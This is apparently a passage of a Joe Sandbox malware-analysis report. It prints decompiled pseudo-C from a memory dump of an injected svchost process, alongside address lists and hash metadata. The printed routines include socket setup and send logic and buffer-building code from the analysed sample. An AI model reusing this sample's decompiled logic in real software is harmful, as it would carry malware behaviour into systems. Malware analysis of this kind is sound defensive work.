                                                                                                                                                                                                                                                                          					while(_a4 != 0 && (_a8 & 0x0000ffff) != 0) {
                                                                                                                                                                                                                                                                          						_v16 =  *0x425284(2, 1, 6, 0, 0, 1);
                                                                                                                                                                                                                                                                          						__eflags = _v16 - 0xffffffff;
                                                                                                                                                                                                                                                                          						if(_v16 != 0xffffffff) {
                                                                                                                                                                                                                                                                          							_v20 = 0;
                                                                                                                                                                                                                                                                          							 *0x42527c(_v16, 0xffff, 0x1001,  &_v20, 4);
                                                                                                                                                                                                                                                                          							E04007010(_t162,  &_v44, 0, 0x10);
                                                                                                                                                                                                                                                                          							_t165 = _t165 + 0xc;
                                                                                                                                                                                                                                                                          							_v44 = 2;
                                                                                                                                                                                                                                                                          							_v40 = 0;
                                                                                                                                                                                                                                                                          							_v42 = 0;
                                                                                                                                                                                                                                                                          							_t101 =  *0x425280(_v16,  &_v44, 0x10);
                                                                                                                                                                                                                                                                          							__eflags = _t101;
                                                                                                                                                                                                                                                                          							if(_t101 == 0) {
                                                                                                                                                                                                                                                                          								_t102 = E04020CE0(0x5c);
                                                                                                                                                                                                                                                                          								_t165 = _t165 + 4;
                                                                                                                                                                                                                                                                          								_v52 = _t102;
                                                                                                                                                                                                                                                                          								__eflags = _v52;
                                                                                                                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                                                                                                                          									_v68 = 0;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v68 = E04005630(_v52, __eflags);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v12 = _v68;
                                                                                                                                                                                                                                                                          								 *((intOrPtr*)(_v12 + 0x34)) = 0x77777777;
                                                                                                                                                                                                                                                                          								 *((intOrPtr*)(_v12 + 0x54)) = 2;
                                                                                                                                                                                                                                                                          								_v48 =  *0x42516c(_v16,  *((intOrPtr*)(_v64 + 8)), _v12, 0);
                                                                                                                                                                                                                                                                          								_t106 = _v64;
                                                                                                                                                                                                                                                                          								__eflags = _v48 -  *((intOrPtr*)(_t106 + 8));
                                                                                                                                                                                                                                                                          								if(_v48 ==  *((intOrPtr*)(_t106 + 8))) {
                                                                                                                                                                                                                                                                          									E04007010(_t162,  &_v44, 0, 0x10);
                                                                                                                                                                                                                                                                          									_v44 = 2;
                                                                                                                                                                                                                                                                          									_v40 = _a4;
                                                                                                                                                                                                                                                                          									_v42 =  *0x425278(_a8 & 0x0000ffff);
                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_v12 + 0x30)) = _v64;
                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_v12 + 0x28)) = _v16;
                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_v12 + 0x2c)) = 2;
                                                                                                                                                                                                                                                                          									E04006CA0(_t126, _t162, _t163, _v12 + 0x38,  &_v44);
                                                                                                                                                                                                                                                                          									_t165 = _t165 + 0x18;
                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_v12 + 0x48)) = 0x10;
                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_v12 + 0x18)) =  *((intOrPtr*)(_v12 + 0x18)) + 1;
                                                                                                                                                                                                                                                                          									_t140 = _v64;
                                                                                                                                                                                                                                                                          									_t161 =  *((intOrPtr*)(_t140 + 0xc));
                                                                                                                                                                                                                                                                          									_v24 =  *((intOrPtr*)( *((intOrPtr*)(_t140 + 0xc))))(_v16, _v12 + 0x38,  *((intOrPtr*)(_v12 + 0x48)), 0, 0, 0, _v12, 0x10);
                                                                                                                                                                                                                                                                          									__eflags = _v24;
                                                                                                                                                                                                                                                                          									if(__eflags != 0) {
                                                                                                                                                                                                                                                                          										L17:
                                                                                                                                                                                                                                                                          										_v8 = E04006410(_t126,  *((intOrPtr*)(_v64 + 4)), _t162, _t163, __eflags, _v12, 0);
                                                                                                                                                                                                                                                                          										_t161 = 0;
                                                                                                                                                                                                                                                                          										__eflags = 0;
                                                                                                                                                                                                                                                                          										if(0 != 0) {
                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										goto L18;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									__eflags =  *0x425274() - 0x3e5;
                                                                                                                                                                                                                                                                          									if(__eflags == 0) {
                                                                                                                                                                                                                                                                          										goto L17;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								goto L18;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							goto L18;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						goto L18;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L18:
                                                                                                                                                                                                                                                                          					if(_v8 == 0) {
                                                                                                                                                                                                                                                                          						if(_v16 != 0xffffffff) {
                                                                                                                                                                                                                                                                          							 *0x42524c(_v16);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(_v12 != 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                          							_v60 = _v12;
                                                                                                                                                                                                                                                                          							_t161 = _v60;
                                                                                                                                                                                                                                                                          							_v56 = _v60;
                                                                                                                                                                                                                                                                          							if(_v56 == 0) {
                                                                                                                                                                                                                                                                          								_v72 = 0;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v72 = E04006A90(_v56, 1);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v12 = 0x666;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				} while (0 != 0);
                                                                                                                                                                                                                                                                          				return E04006C8C(_v8, _t126, _v28 ^ _t164, _t161, _t162, _t163);
                                                                                                                                                                                                                                                                          			}




























                                                                                                                                                                                                                                                                          0x04020920
                                                                                                                                                                                                                                                                          0x04020920
                                                                                                                                                                                                                                                                          0x04020920
                                                                                                                                                                                                                                                                          0x0402092d
                                                                                                                                                                                                                                                                          0x04020930
                                                                                                                                                                                                                                                                          0x04020933
                                                                                                                                                                                                                                                                          0x0402093a
                                                                                                                                                                                                                                                                          0x0402093a
                                                                                                                                                                                                                                                                          0x04020941
                                                                                                                                                                                                                                                                          0x04020948
                                                                                                                                                                                                                                                                          0x0402096d
                                                                                                                                                                                                                                                                          0x04020970
                                                                                                                                                                                                                                                                          0x04020974
                                                                                                                                                                                                                                                                          0x0402097b
                                                                                                                                                                                                                                                                          0x04020996
                                                                                                                                                                                                                                                                          0x040209a4
                                                                                                                                                                                                                                                                          0x040209a9
                                                                                                                                                                                                                                                                          0x040209b1
                                                                                                                                                                                                                                                                          0x040209b5
                                                                                                                                                                                                                                                                          0x040209be
                                                                                                                                                                                                                                                                          0x040209cc
                                                                                                                                                                                                                                                                          0x040209d2
                                                                                                                                                                                                                                                                          0x040209d4
                                                                                                                                                                                                                                                                          0x040209dd
                                                                                                                                                                                                                                                                          0x040209e2
                                                                                                                                                                                                                                                                          0x040209e5
                                                                                                                                                                                                                                                                          0x040209e8
                                                                                                                                                                                                                                                                          0x040209ec
                                                                                                                                                                                                                                                                          0x040209fb
                                                                                                                                                                                                                                                                          0x040209ee
                                                                                                                                                                                                                                                                          0x040209f6
                                                                                                                                                                                                                                                                          0x040209f6
                                                                                                                                                                                                                                                                          0x04020a05
                                                                                                                                                                                                                                                                          0x04020a0b
                                                                                                                                                                                                                                                                          0x04020a15
                                                                                                                                                                                                                                                                          0x04020a33
                                                                                                                                                                                                                                                                          0x04020a36
                                                                                                                                                                                                                                                                          0x04020a3c
                                                                                                                                                                                                                                                                          0x04020a3f
                                                                                                                                                                                                                                                                          0x04020a4e
                                                                                                                                                                                                                                                                          0x04020a5b
                                                                                                                                                                                                                                                                          0x04020a62
                                                                                                                                                                                                                                                                          0x04020a70
                                                                                                                                                                                                                                                                          0x04020a7a
                                                                                                                                                                                                                                                                          0x04020a83
                                                                                                                                                                                                                                                                          0x04020a89
                                                                                                                                                                                                                                                                          0x04020a9d
                                                                                                                                                                                                                                                                          0x04020aa2
                                                                                                                                                                                                                                                                          0x04020aa8
                                                                                                                                                                                                                                                                          0x04020abb
                                                                                                                                                                                                                                                                          0x04020ada
                                                                                                                                                                                                                                                                          0x04020add
                                                                                                                                                                                                                                                                          0x04020ae2
                                                                                                                                                                                                                                                                          0x04020ae5
                                                                                                                                                                                                                                                                          0x04020ae9
                                                                                                                                                                                                                                                                          0x04020afa
                                                                                                                                                                                                                                                                          0x04020b0b
                                                                                                                                                                                                                                                                          0x04020b0e
                                                                                                                                                                                                                                                                          0x04020b0e
                                                                                                                                                                                                                                                                          0x04020b10
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04020b10
                                                                                                                                                                                                                                                                          0x04020af1
                                                                                                                                                                                                                                                                          0x04020af6
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04020a41
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04020a3f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040209d6
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04020976
                                                                                                                                                                                                                                                                          0x04020b16
                                                                                                                                                                                                                                                                          0x04020b1a
                                                                                                                                                                                                                                                                          0x04020b20
                                                                                                                                                                                                                                                                          0x04020b26
                                                                                                                                                                                                                                                                          0x04020b26
                                                                                                                                                                                                                                                                          0x04020b30
                                                                                                                                                                                                                                                                          0x04020b3b
                                                                                                                                                                                                                                                                          0x04020b3e
                                                                                                                                                                                                                                                                          0x04020b41
                                                                                                                                                                                                                                                                          0x04020b48
                                                                                                                                                                                                                                                                          0x04020b59
                                                                                                                                                                                                                                                                          0x04020b4a
                                                                                                                                                                                                                                                                          0x04020b54
                                                                                                                                                                                                                                                                          0x04020b54
                                                                                                                                                                                                                                                                          0x04020b60
                                                                                                                                                                                                                                                                          0x04020b60
                                                                                                                                                                                                                                                                          0x04020b30
                                                                                                                                                                                                                                                                          0x04020b67
                                                                                                                                                                                                                                                                          0x04020b7f

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _memsetcodecvt
                                                                                                                                                                                                                                                                          • String ID: wwww
                                                                                                                                                                                                                                                                          • API String ID: 2800761558-671953474
                                                                                                                                                                                                                                                                          • Opcode ID: 3b53e552e292a3f9917d3afa780c2f46f6f1ddef7a9f945bd37204f127812075
                                                                                                                                                                                                                                                                          • Instruction ID: 61b96e00e12962727ee7777b3b76a6d85f6ef15ab9ff8b766a9639ba92e0cd34
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b53e552e292a3f9917d3afa780c2f46f6f1ddef7a9f945bd37204f127812075
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88813C74E00318EFEB24CFA4D985BEDBBB5AF48318F108159E605BB2D0D775AA81CB54
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                                                                                                          			E04011930(void* __ebx, intOrPtr __ecx, void* __eflags) {
                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                          				void _v36;
                                                                                                                                                                                                                                                                          				signed short _v40;
                                                                                                                                                                                                                                                                          				signed short _v42;
                                                                                                                                                                                                                                                                          				signed short _v44;
                                                                                                                                                                                                                                                                          				signed short _v46;
                                                                                                                                                                                                                                                                          				signed short _v50;
                                                                                                                                                                                                                                                                          				signed short _v52;
                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                          				intOrPtr _v76;
                                                                                                                                                                                                                                                                          				intOrPtr _v80;
                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                          				void* _t56;
                                                                                                                                                                                                                                                                          				signed int _t77;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t56 = __ebx;
                                                                                                                                                                                                                                                                          				_v8 =  *0x429024 ^ _t77;
                                                                                                                                                                                                                                                                          				_v76 = __ecx;
                                                                                                                                                                                                                                                                          				_v56 = 0;
                                                                                                                                                                                                                                                                          				memcpy( &_v36, 0x427060, 6 << 2);
                                                                                                                                                                                                                                                                          				asm("movsb");
                                                                                                                                                                                                                                                                          				_v64 = E04020CE0(0x29);
                                                                                                                                                                                                                                                                          				_v60 = _v64;
                                                                                                                                                                                                                                                                          				E04007010(0x42706c, _v60, 0, 0x29);
                                                                                                                                                                                                                                                                          				 *0x425180( &_v52);
                                                                                                                                                                                                                                                                          				 *0x4251f8(_v60, 0x28,  &_v36, _v52 & 0x0000ffff, _v50 & 0x0000ffff, _v46 & 0x0000ffff, _v44 & 0x0000ffff, _v42 & 0x0000ffff, _v40 & 0x0000ffff);
                                                                                                                                                                                                                                                                          				_v68 = E04020CE0(8);
                                                                                                                                                                                                                                                                          				if(_v68 == 0) {
                                                                                                                                                                                                                                                                          					_v80 = 0;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v80 = E0401F4E0(_v68);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_t72 = _v80;
                                                                                                                                                                                                                                                                          				_v56 = _v80;
                                                                                                                                                                                                                                                                          				E0401FC90(_t56, _v56, 0x42706c, 0x427060, _v60, E040070A0(_v60));
                                                                                                                                                                                                                                                                          				if(_v60 != 0) {
                                                                                                                                                                                                                                                                          					_t72 = _v60;
                                                                                                                                                                                                                                                                          					_v72 = _v60;
                                                                                                                                                                                                                                                                          					E04020CC0(_v72);
                                                                                                                                                                                                                                                                          					_v60 = 0x666;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return E04006C8C(_v56, _t56, _v8 ^ _t77, _t72, 0x42706c, 0x427060);
                                                                                                                                                                                                                                                                          			}






















                                                                                                                                                                                                                                                                          0x04011930
                                                                                                                                                                                                                                                                          0x0401193d
                                                                                                                                                                                                                                                                          0x04011942
                                                                                                                                                                                                                                                                          0x04011945
                                                                                                                                                                                                                                                                          0x04011959
                                                                                                                                                                                                                                                                          0x0401195b
                                                                                                                                                                                                                                                                          0x04011966
                                                                                                                                                                                                                                                                          0x0401196c
                                                                                                                                                                                                                                                                          0x04011977
                                                                                                                                                                                                                                                                          0x04011983
                                                                                                                                                                                                                                                                          0x040119b1
                                                                                                                                                                                                                                                                          0x040119c4
                                                                                                                                                                                                                                                                          0x040119cb
                                                                                                                                                                                                                                                                          0x040119da
                                                                                                                                                                                                                                                                          0x040119cd
                                                                                                                                                                                                                                                                          0x040119d5
                                                                                                                                                                                                                                                                          0x040119d5
                                                                                                                                                                                                                                                                          0x040119e1
                                                                                                                                                                                                                                                                          0x040119e4
                                                                                                                                                                                                                                                                          0x040119fb
                                                                                                                                                                                                                                                                          0x04011a04
                                                                                                                                                                                                                                                                          0x04011a06
                                                                                                                                                                                                                                                                          0x04011a09
                                                                                                                                                                                                                                                                          0x04011a10
                                                                                                                                                                                                                                                                          0x04011a18
                                                                                                                                                                                                                                                                          0x04011a18
                                                                                                                                                                                                                                                                          0x04011a31

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Iterator_baseIterator_base::__memset_strlenstd::_
                                                                                                                                                                                                                                                                          • String ID: `pB
                                                                                                                                                                                                                                                                          • API String ID: 3713721629-8080248
                                                                                                                                                                                                                                                                          • Opcode ID: 6e851101af669da2590ada226c12d76250e880d2472f87e89cdad929c21c02bd
                                                                                                                                                                                                                                                                          • Instruction ID: 23dbd6e54e78f367103934f2d22059264fab70093216257e69c110f1ce7c75f9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e851101af669da2590ada226c12d76250e880d2472f87e89cdad929c21c02bd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01313CB1D01218ABEB14EFD5E944AEEBBB5EF4C308F104029F505B7280E7756944CB61
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                                                                          			E04005630(intOrPtr __ecx, void* __eflags) {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				void* _t53;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = __ecx;
                                                                                                                                                                                                                                                                          				E04007010(_t53, _v8, 0, 0x14);
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_v8 + 0x34)) = 0x77777777;
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_v8 + 0x14)) =  *0x4250c0(0, 1, 0, 0, __ecx);
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_v8 + 0x1c)) = 0;
                                                                                                                                                                                                                                                                          				E04007010(_t53, _v8 + 0x20, 0, 8);
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_v8 + 0x28)) = 0;
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_v8 + 0x2c)) = 0;
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_v8 + 0x30)) = 0;
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_v8 + 0x18)) = 0;
                                                                                                                                                                                                                                                                          				E04007010(_t53, _v8 + 0x38, 0, 0x10);
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_v8 + 0x48)) = 0x10;
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_v8 + 0x4c)) = 0;
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_v8 + 0x50)) = 0;
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_v8 + 0x54)) = 0;
                                                                                                                                                                                                                                                                          				 *((char*)(_v8 + 0x58)) = 0;
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}





                                                                                                                                                                                                                                                                          0x04005634
                                                                                                                                                                                                                                                                          0x0400563f
                                                                                                                                                                                                                                                                          0x0400564a
                                                                                                                                                                                                                                                                          0x04005662
                                                                                                                                                                                                                                                                          0x04005668
                                                                                                                                                                                                                                                                          0x0400567a
                                                                                                                                                                                                                                                                          0x04005685
                                                                                                                                                                                                                                                                          0x0400568f
                                                                                                                                                                                                                                                                          0x04005699
                                                                                                                                                                                                                                                                          0x040056a3
                                                                                                                                                                                                                                                                          0x040056b5
                                                                                                                                                                                                                                                                          0x040056c0
                                                                                                                                                                                                                                                                          0x040056ca
                                                                                                                                                                                                                                                                          0x040056d4
                                                                                                                                                                                                                                                                          0x040056de
                                                                                                                                                                                                                                                                          0x040056e8
                                                                                                                                                                                                                                                                          0x040056f2

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _memset
                                                                                                                                                                                                                                                                          • String ID: wwww
                                                                                                                                                                                                                                                                          • API String ID: 2102423945-671953474
                                                                                                                                                                                                                                                                          • Opcode ID: 56981159b78f17c5b562ff2e7d8da521ae3d0b0f004ad004817d56aaae5714f0
                                                                                                                                                                                                                                                                          • Instruction ID: 7ac7e521c84300ad453423b6d132e18307e481511a592d402c42c44ac5e64213
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56981159b78f17c5b562ff2e7d8da521ae3d0b0f004ad004817d56aaae5714f0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E21B874A40208EBEB54CF94D995B9EB7B1BB48708F204588E9046F3C1D7B6AF45EBC4
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                                                                                                          			E04015C60(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				intOrPtr* _v12;
                                                                                                                                                                                                                                                                          				intOrPtr* _v16;
                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                          				void _v52;
                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                          				intOrPtr _v76;
                                                                                                                                                                                                                                                                          				intOrPtr _v80;
                                                                                                                                                                                                                                                                          				intOrPtr _v84;
                                                                                                                                                                                                                                                                          				intOrPtr _v88;
                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                          				void* _t107;
                                                                                                                                                                                                                                                                          				intOrPtr _t115;
                                                                                                                                                                                                                                                                          				signed char _t118;
                                                                                                                                                                                                                                                                          				signed char _t124;
                                                                                                                                                                                                                                                                          				void* _t126;
                                                                                                                                                                                                                                                                          				void* _t161;
                                                                                                                                                                                                                                                                          				signed int _t183;
                                                                                                                                                                                                                                                                          				void* _t184;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t161 = __edx;
                                                                                                                                                                                                                                                                          				_t126 = __ebx;
                                                                                                                                                                                                                                                                          				_v20 =  *0x429024 ^ _t183;
                                                                                                                                                                                                                                                                          				_v76 = __ecx;
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				while(_a4 != 0) {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_v5 = 1;
                                                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                                                          						_t162 = _a4;
                                                                                                                                                                                                                                                                          						_v12 = E04013F50(_t126, _v76, 0x426eaa, 0x426e9c, _a4, 0, 0xffffffff, 0,  *(_v76 + 0x19) & 0x000000ff);
                                                                                                                                                                                                                                                                          						if(_v12 != 0) {
                                                                                                                                                                                                                                                                          							_v16 = E04015360(_t126, _v76, 0x426eaa, 0x426e9c, _v12);
                                                                                                                                                                                                                                                                          							if(_v16 == 0) {
                                                                                                                                                                                                                                                                          								if( *((intOrPtr*)(_v76 + 0xc)) == 0) {
                                                                                                                                                                                                                                                                          									_t115 = E04020CE0(8);
                                                                                                                                                                                                                                                                          									_t184 = _t184 + 4;
                                                                                                                                                                                                                                                                          									_v64 = _t115;
                                                                                                                                                                                                                                                                          									if(_v64 == 0) {
                                                                                                                                                                                                                                                                          										_v84 = 0;
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          										_v84 = E0401F4E0(_v64);
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									_t162 = _v84;
                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_v76 + 0xc)) = _v84;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								memcpy( &_v52, 0x426e9c, 7 << 2);
                                                                                                                                                                                                                                                                          								asm("movsb");
                                                                                                                                                                                                                                                                          								E0401F9F0(_t126,  *((intOrPtr*)(_v76 + 0xc)), _t162,  &_v52, 0x1c, 0);
                                                                                                                                                                                                                                                                          								E0401F9F0(_t126,  *((intOrPtr*)(_v76 + 0xc)), _v76, 0x426c50, 2, 0);
                                                                                                                                                                                                                                                                          								_t107 = E040070A0( *_v12);
                                                                                                                                                                                                                                                                          								_t184 = _t184 + 0x10;
                                                                                                                                                                                                                                                                          								E0401F9F0(_t126,  *((intOrPtr*)(_v76 + 0xc)), _v12,  *_v12, _t107, 0);
                                                                                                                                                                                                                                                                          								E0401F9F0(_t126,  *((intOrPtr*)(_v76 + 0xc)), _v76, 0x426c54, 2, 0);
                                                                                                                                                                                                                                                                          								E0401F9F0(_t126,  *((intOrPtr*)(_v76 + 0xc)), _v76, 0x426ebc, 4, 0);
                                                                                                                                                                                                                                                                          								 *(_v76 + 0x1a) = 1;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								if( *_v16 == 0 ||  *((intOrPtr*)(_v16 + 4)) <= 0) {
                                                                                                                                                                                                                                                                          									_t118 = E0401F7C0(_t126, _a4, 0x426eaa, 0x426e9c,  *((intOrPtr*)(_v12 + 0x28)),  *((intOrPtr*)(_v12 + 0x2c)));
                                                                                                                                                                                                                                                                          									asm("sbb edx, edx");
                                                                                                                                                                                                                                                                          									 *(_v76 + 0x1a) =  ~(_t118 & 0x000000ff) + 1;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_t124 = E0401F6B0(_t126, _a4, 0x426eaa, 0x426e9c,  *((intOrPtr*)(_v12 + 0x28)),  *((intOrPtr*)(_v12 + 0x2c)),  *_v16,  *((intOrPtr*)(_v16 + 4)));
                                                                                                                                                                                                                                                                          									asm("sbb edx, edx");
                                                                                                                                                                                                                                                                          									 *(_v76 + 0x1a) =  ~(_t124 & 0x000000ff) + 1;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								if(_v16 != 0) {
                                                                                                                                                                                                                                                                          									_v60 = _v16;
                                                                                                                                                                                                                                                                          									_v56 = _v60;
                                                                                                                                                                                                                                                                          									if(_v56 == 0) {
                                                                                                                                                                                                                                                                          										_v80 = 0;
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          										_v80 = E04004EA0(_v56, 1);
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									_v16 = 0x666;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							if(_v12 != 0) {
                                                                                                                                                                                                                                                                          								_v72 = _v12;
                                                                                                                                                                                                                                                                          								_v68 = _v72;
                                                                                                                                                                                                                                                                          								if(_v68 == 0) {
                                                                                                                                                                                                                                                                          									_v88 = 0;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v88 = E04006780(_v68, 1);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v12 = 0x666;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					} while (_v12 != 0 && ( *(_v76 + 0x1a) & 0x000000ff) == 0);
                                                                                                                                                                                                                                                                          					asm("sbb ecx, ecx");
                                                                                                                                                                                                                                                                          					_v5 =  ~( *(_v76 + 0x1a) & 0x000000ff) + 1;
                                                                                                                                                                                                                                                                          					_t161 = 0;
                                                                                                                                                                                                                                                                          					if(0 != 0) {
                                                                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L30:
                                                                                                                                                                                                                                                                          					return E04006C8C(_v5, _t126, _v20 ^ _t183, _t161, 0x426eaa, 0x426e9c);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				goto L30;
                                                                                                                                                                                                                                                                          			}



























                                                                                                                                                                                                                                                                          0x04015c60
                                                                                                                                                                                                                                                                          0x04015c60
                                                                                                                                                                                                                                                                          0x04015c6d
                                                                                                                                                                                                                                                                          0x04015c72
                                                                                                                                                                                                                                                                          0x04015c75
                                                                                                                                                                                                                                                                          0x04015c79
                                                                                                                                                                                                                                                                          0x04015c84
                                                                                                                                                                                                                                                                          0x04015c8b
                                                                                                                                                                                                                                                                          0x04015c8f
                                                                                                                                                                                                                                                                          0x04015c9d
                                                                                                                                                                                                                                                                          0x04015ca9
